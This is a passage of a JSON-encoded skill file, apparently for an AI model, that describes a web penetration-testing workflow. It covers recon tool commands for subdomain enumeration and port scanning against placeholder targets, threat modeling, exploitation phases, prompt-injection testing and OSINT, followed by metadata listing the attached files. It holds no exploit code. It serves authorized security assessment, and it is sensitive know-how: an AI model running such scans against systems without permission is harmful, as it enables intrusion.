skills:","type":"text"}]},{"type":"table","attrs":{"layout":null},"content":[{"type":"tr","content":[{"type":"th","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Phase","type":"text"}]}]},{"type":"th","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Skill","type":"text"}]}]},{"type":"th","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Purpose","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Scope Definition","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Recon","type":"text","marks":[{"type":"strong"}]}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Corporate structure, domain enumeration","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Target Discovery","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Recon","type":"text","marks":[{"type":"strong"}]}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Subdomains, endpoints, ports","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Understanding","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"WebAssessment","type":"text","marks":[{"type":"strong"}]}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"App narrative, user flows, sensitive data","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Threat Modeling","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"WebAssessment","type":"text","marks":[{"type":"strong"}]}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Attack scenarios, test prioritization","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Injection Testing","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"PromptInjection","type":"text","marks":[{"type":"strong"}]}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"LLM-specific attacks","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Intelligence","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"OSINT","type":"text","marks":[{"type":"strong"}]}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"People, companies, social media","type":"text"}]}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Assessment Workflow","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":""},"content":[{"text":"1. Corporate Structure (Recon) → Define scope and targets\n2. Subdomain Enumeration (Recon) → Find all domains\n3. Endpoint Discovery (Recon) → Extract JS endpoints\n4. Understand Application → Build app narrative\n5. Create Threat Model → Prioritize attack scenarios\n6. Execute Testing → Test against identified threats\n7. Report Findings → Document with PoCs","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Recon Skill Tools","type":"text"}]},{"type":"paragraph","content":[{"text":"WebAssessment uses tools from the Recon skill:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Corporate structure for scope\nbun ~/.claude/skills/Security/Recon/Tools/CorporateStructure.ts target.com\n\n# Subdomain enumeration\nbun ~/.claude/skills/Security/Recon/Tools/SubdomainEnum.ts target.com\n\n# Endpoint discovery from JavaScript\nbun ~/.claude/skills/Security/Recon/Tools/EndpointDiscovery.ts https://target.com\n\n# Port scanning\nbun ~/.claude/skills/Security/Recon/Tools/PortScan.ts target.com\n\n# Path discovery\nbun ~/.claude/skills/Security/Recon/Tools/PathDiscovery.ts https://target.com","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"UnderstandApplication Output","type":"text"}]},{"type":"paragraph","content":[{"text":"Produces structured narrative including:","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Summary","type":"text","marks":[{"type":"strong"}]},{"text":": Purpose, industry, user base, critical functions","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"User Roles","type":"text","marks":[{"type":"strong"}]},{"text":": Access levels and capabilities","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"User Flows","type":"text","marks":[{"type":"strong"}]},{"text":": Step-by-step processes with sensitive data","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Technology Stack","type":"text","marks":[{"type":"strong"}]},{"text":": Frontend, backend, auth, third-party","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Attack Surface","type":"text","marks":[{"type":"strong"}]},{"text":": Entry points, inputs, file uploads, websockets","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"CreateThreatModel Output","type":"text"}]},{"type":"paragraph","content":[{"text":"Generates prioritized attack plan:","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Threats","type":"text","marks":[{"type":"strong"}]},{"text":": OWASP/CWE mapped with risk scores","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Attack Paths","type":"text","marks":[{"type":"strong"}]},{"text":": Multi-step attack scenarios","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Test Plan","type":"text","marks":[{"type":"strong"}]},{"text":": Prioritized with tool suggestions","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Effort Estimates","type":"text","marks":[{"type":"strong"}]},{"text":": Quick/medium/extensive per threat","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Threat Categories","type":"text"}]},{"type":"table","attrs":{"layout":null},"content":[{"type":"tr","content":[{"type":"th","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Category","type":"text"}]}]},{"type":"th","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Triggers On","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Authentication","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Auth mechanisms detected","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Access Control","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Multiple user roles","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Injection","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"All web apps","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Data Exposure","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Sensitive data identified","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"File Upload","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Upload functionality","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"API Security","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"API endpoints","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"WebSocket","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"WebSocket detected","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Business Logic","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"All web apps","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Payment Security","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Payment flows","type":"text"}]}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"6-Phase Pentest Methodology","type":"text"}]},{"type":"paragraph","content":[{"text":"Phase 0","type":"text","marks":[{"type":"strong"}]},{"text":": Scoping & Preparation ","type":"text"},{"text":"Phase 1","type":"text","marks":[{"type":"strong"}]},{"text":": Reconnaissance (Recon skill) ","type":"text"},{"text":"Phase 2","type":"text","marks":[{"type":"strong"}]},{"text":": Mapping (content discovery) ","type":"text"},{"text":"Phase 3","type":"text","marks":[{"type":"strong"}]},{"text":": Vulnerability Analysis ","type":"text"},{"text":"Phase 4","type":"text","marks":[{"type":"strong"}]},{"text":": Exploitation ","type":"text"},{"text":"Phase 5","type":"text","marks":[{"type":"strong"}]},{"text":": Reporting","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Key Principles","type":"text"}]},{"type":"ordered_list","attrs":{"order":1,"listStyle":"number"},"content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Authorization first","type":"text","marks":[{"type":"strong"}]},{"text":" - Never test without explicit permission","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Understand before testing","type":"text","marks":[{"type":"strong"}]},{"text":" - Build app narrative first","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Threat model guides testing","type":"text","marks":[{"type":"strong"}]},{"text":" - Don't test blindly","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Breadth then depth","type":"text","marks":[{"type":"strong"}]},{"text":" - Wide recon, focused exploitation","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Document everything","type":"text","marks":[{"type":"strong"}]},{"text":" - Notes, screenshots, commands","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Workflow Index","type":"text"}]},{"type":"paragraph","content":[{"text":"Core Assessment:","type":"text","marks":[{"type":"strong"}]}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Workflows/UnderstandApplication.md","type":"text","marks":[{"type":"code_inline"}]},{"text":" - Application reconnaissance","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Workflows/CreateThreatModel.md","type":"text","marks":[{"type":"code_inline"}]},{"text":" - Attack scenario generation","type":"text"}]}]}]},{"type":"paragraph","content":[{"text":"Penetration Testing:","type":"text","marks":[{"type":"strong"}]}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Workflows/pentest/MasterMethodology.md","type":"text","marks":[{"type":"code_inline"}]},{"text":" - 6-phase methodology","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Workflows/pentest/ToolInventory.md","type":"text","marks":[{"type":"code_inline"}]},{"text":" - Security tools reference","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Workflows/pentest/Reconnaissance.md","type":"text","marks":[{"type":"code_inline"}]},{"text":" - Asset discovery","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Workflows/pentest/Exploitation.md","type":"text","marks":[{"type":"code_inline"}]},{"text":" - Vulnerability testing","type":"text"}]}]}]},{"type":"paragraph","content":[{"text":"Web Fuzzing:","type":"text","marks":[{"type":"strong"}]}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Workflows/ffuf/FfufGuide.md","type":"text","marks":[{"type":"code_inline"}]},{"text":" - FFUF fuzzing guide","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Workflows/ffuf/FfufHelper.md","type":"text","marks":[{"type":"code_inline"}]},{"text":" - Automated fuzzing helper","type":"text"}]}]}]},{"type":"paragraph","content":[{"text":"Bug Bounty:","type":"text","marks":[{"type":"strong"}]}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Workflows/bug-bounty/Programs.md","type":"text","marks":[{"type":"code_inline"}]},{"text":" - Program tracking","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Workflows/bug-bounty/AutomationTool.md","type":"text","marks":[{"type":"code_inline"}]},{"text":" - Bounty automation","type":"text"}]}]}]},{"type":"paragraph","content":[{"text":"Web App Testing:","type":"text","marks":[{"type":"strong"}]}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Workflows/webapp/TestingGuide.md","type":"text","marks":[{"type":"code_inline"}]},{"text":" - Playwright testing","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Workflows/webapp/Examples.md","type":"text","marks":[{"type":"code_inline"}]},{"text":" - Testing patterns","type":"text"}]}]}]},{"type":"paragraph","content":[{"text":"OSINT:","type":"text","marks":[{"type":"strong"}]}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Workflows/osint/MasterGuide.md","type":"text","marks":[{"type":"code_inline"}]},{"text":" - OSINT methodology","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Workflows/osint/Reconnaissance.md","type":"text","marks":[{"type":"code_inline"}]},{"text":" - Domain recon","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Workflows/osint/SocialMediaIntel.md","type":"text","marks":[{"type":"code_inline"}]},{"text":" - SOCMINT","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Workflows/osint/Automation.md","type":"text","marks":[{"type":"code_inline"}]},{"text":" - SpiderFoot/Maltego","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Workflows/osint/MetadataAnalysis.md","type":"text","marks":[{"type":"code_inline"}]},{"text":" - ExifTool analysis","type":"text"}]}]}]},{"type":"paragraph","content":[{"text":"AI-Powered:","type":"text","marks":[{"type":"strong"}]}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Workflows/VulnerabilityAnalysisGemini3.md","type":"text","marks":[{"type":"code_inline"}]},{"text":" - Gemini deep analysis","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Examples","type":"text"}]},{"type":"paragraph","content":[{"text":"Example 1: Full assessment workflow","type":"text","marks":[{"type":"strong"}]}]},{"type":"code_block","attrs":{"wrap":false,"language":""},"content":[{"text":"User: \"Security assessment on app.example.com\"\n→ Run UnderstandApplication to build narrative\n→ Run CreateThreatModel to prioritize testing\n→ Follow MasterMethodology with threat model guidance\n→ Report findings with OWASP/CWE references","type":"text"}]},{"type":"paragraph","content":[{"text":"Example 2: Quick threat model","type":"text","marks":[{"type":"strong"}]}]},{"type":"code_block","attrs":{"wrap":false,"language":""},"content":[{"text":"User: \"How would I attack this app?\"\n→ Run CreateThreatModel on target\n→ Get prioritized attack paths\n→ Get test plan with tool suggestions","type":"text"}]},{"type":"paragraph","content":[{"text":"Example 3: Integrate with Recon","type":"text","marks":[{"type":"strong"}]}]},{"type":"code_block","attrs":{"wrap":false,"language":""},"content":[{"text":"User: \"Assessment on target.com including all subdomains\"\n→ CorporateStructure (Recon) → Find parent/child companies\n→ SubdomainEnum (Recon) → Find all subdomains\n→ EndpointDiscovery (Recon) → Extract JS endpoints\n→ UnderstandApplication → Build app narrative\n→ CreateThreatModel → Generate attack plan","type":"text"}]},{"type":"hr","attrs":{"markup":"---"}}]},"metadata":{"date":"2026-06-05","name":"WebAssessment","author":"@skillopedia","source":{"stars":14561,"repo_name":"personal_ai_infrastructure","origin_url":"https://github.com/danielmiessler/personal_ai_infrastructure/blob/HEAD/Releases/v4.0.0/.claude/skills/Security/WebAssessment/SKILL.md","repo_owner":"danielmiessler","body_sha256":"9d8aa25d35f8b70fc257675ce30de8774742f2e8981de020688a96ab5e9232ef","cluster_key":"1a2b01e3c26e98487979c1892d02c50f2df2cd176aa08dfadaf4772046c87c80","clean_bundle":{"format":"clean-skill-bundle-v1","source":"danielmiessler/personal_ai_infrastructure/Releases/v4.0.0/.claude/skills/Security/WebAssessment/SKILL.md","attachments":[{"id":"0f7a3725-19ef-513a-aa57-3a212b633733","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/0f7a3725-19ef-513a-aa57-3a212b633733/attachment.md","path":"BugBountyTool/README.md","size":7006,"sha256":"1412f26632c5cd8e699123ba94950ccf73aefa648447f6c80ca03d234dd2e723","contentType":"text/markdown; charset=utf-8"},{"id":"5ae8dfa9-775f-595d-89c2-52fb4bfa699e","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/5ae8dfa9-775f-595d-89c2-52fb4bfa699e/attachment.sh","path":"BugBountyTool/bounty.sh","size":1678,"sha256":"d06124e0d19faac3172f3887f7f498dad909df18ef57b9b276303fa615dc68bf","contentType":"application/x-sh; charset=utf-8"},{"id":"b21f6fa5-ce14-5c75-9032-ceb7fd58dd86","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/b21f6fa5-ce14-5c75-9032-ceb7fd58dd86/attachment.lock","path":"BugBountyTool/bun.lock","size":544,"sha256":"3639c7d4a720765616a571e45de0a9847a333af35ceea2e983cc1fcfd604a06c","contentType":"text/plain; charset=utf-8"},{"id":"dc9dde75-f5ad-502f-9085-3d1e6f7601bc","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/dc9dde75-f5ad-502f-9085-3d1e6f7601bc/attachment.json","path":"BugBountyTool/package.json","size":381,"sha256":"2adcb2f7401e42c75d899a27892b8a6a67c9e377cdca46f465a17c7a26465357","contentType":"application/json; charset=utf-8"},{"id":"463eafcd-b5ce-5fe2-aa86-f4648895a2eb","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/463eafcd-b5ce-5fe2-aa86-f4648895a2eb/attachment.ts","path":"BugBountyTool/src/config.ts","size":961,"sha256":"d6d7a32e349452ae9c9950f6c1da87fc1bca4bcfdc4a780db8a13d99c8b2dc2b","contentType":"text/typescript; charset=utf-8"},{"id":"5b47e421-b3d6-5c56-b2fc-13c961a9c96a","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/5b47e421-b3d6-5c56-b2fc-13c961a9c96a/attachment.ts","path":"BugBountyTool/src/github.ts","size":4757,"sha256":"fcf05dfb7284becff1843d640d5206ed33b47cbec3c17a6bc7648006666309d9","contentType":"text/typescript; charset=utf-8"},{"id":"005e10ee-f429-5f5d-a211-57e28861a5fa","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/005e10ee-f429-5f5d-a211-57e28861a5fa/attachment.ts","path":"BugBountyTool/src/init.ts","size":322,"sha256":"e0ea8deda56d590405faa8335179da1457e283a561b1c8213695ca95a89a4f09","contentType":"text/typescript; charset=utf-8"},{"id":"92e46021-d1dd-5de2-b258-67f51f1c8e09","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/92e46021-d1dd-5de2-b258-67f51f1c8e09/attachment.ts","path":"BugBountyTool/src/recon.ts","size":4676,"sha256":"4cb18144314229c7801f8013cdab99e05a6b8a421871d96c295402a70729f969","contentType":"text/typescript; charset=utf-8"},{"id":"26ac1479-879f-52cc-9db3-3aa44da398c4","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/26ac1479-879f-52cc-9db3-3aa44da398c4/attachment.ts","path":"BugBountyTool/src/show.ts","size":2569,"sha256":"d1442cc4e202b9d4bdaa83e683305d8e238b46b68895a167348e586d0f375d09","contentType":"text/typescript; charset=utf-8"},{"id":"e39df796-b358-5389-a5a2-b19bfe55616a","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/e39df796-b358-5389-a5a2-b19bfe55616a/attachment.ts","path":"BugBountyTool/src/state.ts","size":3577,"sha256":"108932f17a69dc4b1f09f573ecf266faca199d584f875908fb0ed49762b945e8","contentType":"text/typescript; charset=utf-8"},{"id":"c6b45507-2cde-565d-bebb-a62bf9b9fe53","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/c6b45507-2cde-565d-bebb-a62bf9b9fe53/attachment.ts","path":"BugBountyTool/src/tracker.ts","size":8644,"sha256":"d4787f98fd3f6eca181ad45b0348c9ac3af74837a3c385275a3f61d8560e76c1","contentType":"text/typescript; charset=utf-8"},{"id":"18de29ba-5e2f-5467-8bb2-496def0ef778","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/18de29ba-5e2f-5467-8bb2-496def0ef778/attachment.ts","path":"BugBountyTool/src/types.ts","size":1448,"sha256":"977d49b1b213793d437a07d9e3a609fc976593768ca753951b1d941020a131f9","contentType":"text/typescript; charset=utf-8"},{"id":"eedc87cd-f36b-58a6-b1cb-b30a20f50ff9","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/eedc87cd-f36b-58a6-b1cb-b30a20f50ff9/attachment.ts","path":"BugBountyTool/src/update.ts","size":1940,"sha256":"673b29b00a11e72ed5b03454c147104ee9e96bb5b73a146366e5b309e6b9a8ba","contentType":"text/typescript; charset=utf-8"},{"id":"629aaa93-fbd1-575f-8341-c33b7fa5537c","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/629aaa93-fbd1-575f-8341-c33b7fa5537c/attachment.json","path":"BugBountyTool/state.json","size":362,"sha256":"49f1cb3f3afcf347514f0a0d6f86774815bae8eddcbe3f866cdf78d8aa02aa99","contentType":"application/json; charset=utf-8"},{"id":"90d43bed-c56a-5724-b860-774ce21da64b","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/90d43bed-c56a-5724-b860-774ce21da64b/attachment.md","path":"FfufResources/REQUEST_TEMPLATES.md","size":4789,"sha256":"dad5734c8df662bfe9c2014636df4a0d5daafaff6b8c30cbd88352b2dd3e7b7b","contentType":"text/markdown; charset=utf-8"},{"id":"495bc6d7-74ba-5ce1-9425-354da8da5598","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/495bc6d7-74ba-5ce1-9425-354da8da5598/attachment.md","path":"FfufResources/WORDLISTS.md","size":4487,"sha256":"a698968d67d0259f544d0448e48575703b3ca907d1d3fbfbf18c0be6748dad80","contentType":"text/markdown; charset=utf-8"},{"id":"93cc08cb-7ffc-5f0d-b14a-7770fca94e55","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/93cc08cb-7ffc-5f0d-b14a-7770fca94e55/attachment.md","path":"OsintTools/API-TOOLS-GUIDE.md","size":21172,"sha256":"19ea66bd2d820cad08f22cf0bb04563ea5fefef8e3713ce45f19e048bd674ee7","contentType":"text/markdown; charset=utf-8"},{"id":"053f9633-fd43-55d9-a26c-f7e085fb2c1f","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/053f9633-fd43-55d9-a26c-f7e085fb2c1f/attachment.md","path":"OsintTools/README.md","size":12283,"sha256":"f4d2892a6564aab55122367c2183940c159df02aee9a8048ab22e6fc6383e36a","contentType":"text/markdown; charset=utf-8"},{"id":"edad4d70-57e1-5b82-b60c-cd0859fa1d4d","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/edad4d70-57e1-5b82-b60c-cd0859fa1d4d/attachment.md","path":"OsintTools/automation-frameworks-notes.md","size":12508,"sha256":"002a3515d2981c66209f7d643a73fcb9683b6b0fa3ed2f54374091277588c4bc","contentType":"text/markdown; charset=utf-8"},{"id":"f2b34510-dee6-5b09-8cc1-e8adac47304f","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/f2b34510-dee6-5b09-8cc1-e8adac47304f/attachment.md","path":"OsintTools/network-tools-notes.md","size":10836,"sha256":"cdfe6ad44de487d80f1b511d10c9663e74303de98dfbcb00261a6f972b491899","contentType":"text/markdown; charset=utf-8"},{"id":"edbfb3af-2fa4-5d7e-b087-65ca98ae4621","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/edbfb3af-2fa4-5d7e-b087-65ca98ae4621/attachment.py","path":"OsintTools/osint-api-tools.py","size":22922,"sha256":"6ed6e4d114fbe0ef36c50e12f7ce21f70cbe7e380db71b8c2750dfbc6b356e73","contentType":"text/x-python; charset=utf-8"},{"id":"3c90f2e3-225d-5e73-b7f8-30520f2d0abc","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/3c90f2e3-225d-5e73-b7f8-30520f2d0abc/attachment.md","path":"OsintTools/visualization-threat-intel-notes.md","size":16961,"sha256":"3cd3d23ba61fcab90a47bedde771a0b0a347d6d2cd98dffad61bfe11ff981d62","contentType":"text/markdown; charset=utf-8"},{"id":"9b0614aa-c620-5ece-bc6f-3a17a365db9d","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/9b0614aa-c620-5ece-bc6f-3a17a365db9d/attachment.py","path":"WebappExamples/console_logging.py","size":1027,"sha256":"ea46877289acb82da7e7ce59d0bc37c8977cd57e2a006d0c88d7a1c625bf95da","contentType":"text/x-python; charset=utf-8"},{"id":"809b310e-52f3-5aa8-b418-4c0702d273e1","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/809b310e-52f3-5aa8-b418-4c0702d273e1/attachment.py","path":"WebappExamples/element_discovery.py","size":1463,"sha256":"d63c89604a22f8845d724e95dda45db49b1bf57c25ce0a83afbb7b8da3d402f0","contentType":"text/x-python; charset=utf-8"},{"id":"11aa89d6-c0fd-5c05-b9ab-7a90095e9f8f","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/11aa89d6-c0fd-5c05-b9ab-7a90095e9f8f/attachment.py","path":"WebappExamples/static_html_automation.py","size":953,"sha256":"9d533aafb875ee3ab8b8ebf8f5b9003ac8d999da3d09b285cce252e623140064","contentType":"text/x-python; charset=utf-8"},{"id":"50d2424e-9b7b-562f-9184-f316971a8d4e","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/50d2424e-9b7b-562f-9184-f316971a8d4e/attachment.py","path":"WebappScripts/with_server.py","size":3693,"sha256":"b0dcf4918935b795f4eda9821579b9902119235ff4447f687a30286e7d0925fd","contentType":"text/x-python; charset=utf-8"},{"id":"086399a7-c74b-561d-af29-4d741c331e93","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/086399a7-c74b-561d-af29-4d741c331e93/attachment.md","path":"Workflows/CreateThreatModel.md","size":6879,"sha256":"5c84b8dd9f87b21c2b424fd0164cb06f2094ca473faa41f29f4f8dcf8df5eba6","contentType":"text/markdown; charset=utf-8"},{"id":"9f703c4c-bfa6-5c08-8f3d-a82e4ec29a26","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/9f703c4c-bfa6-5c08-8f3d-a82e4ec29a26/attachment.md","path":"Workflows/UnderstandApplication.md","size":4545,"sha256":"7f827a4f4ab5d0893097b606e463c386067b8f99a1f449ed76002313e7c05a0f","contentType":"text/markdown; charset=utf-8"},{"id":"367d5c73-4007-5528-82a5-c681738804cf","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/367d5c73-4007-5528-82a5-c681738804cf/attachment.md","path":"Workflows/VulnerabilityAnalysisGemini3.md","size":30488,"sha256":"5425cd936a4f90f8637616f947edde1f9717058c4a656b906abdd20519a2e0c3","contentType":"text/markdown; 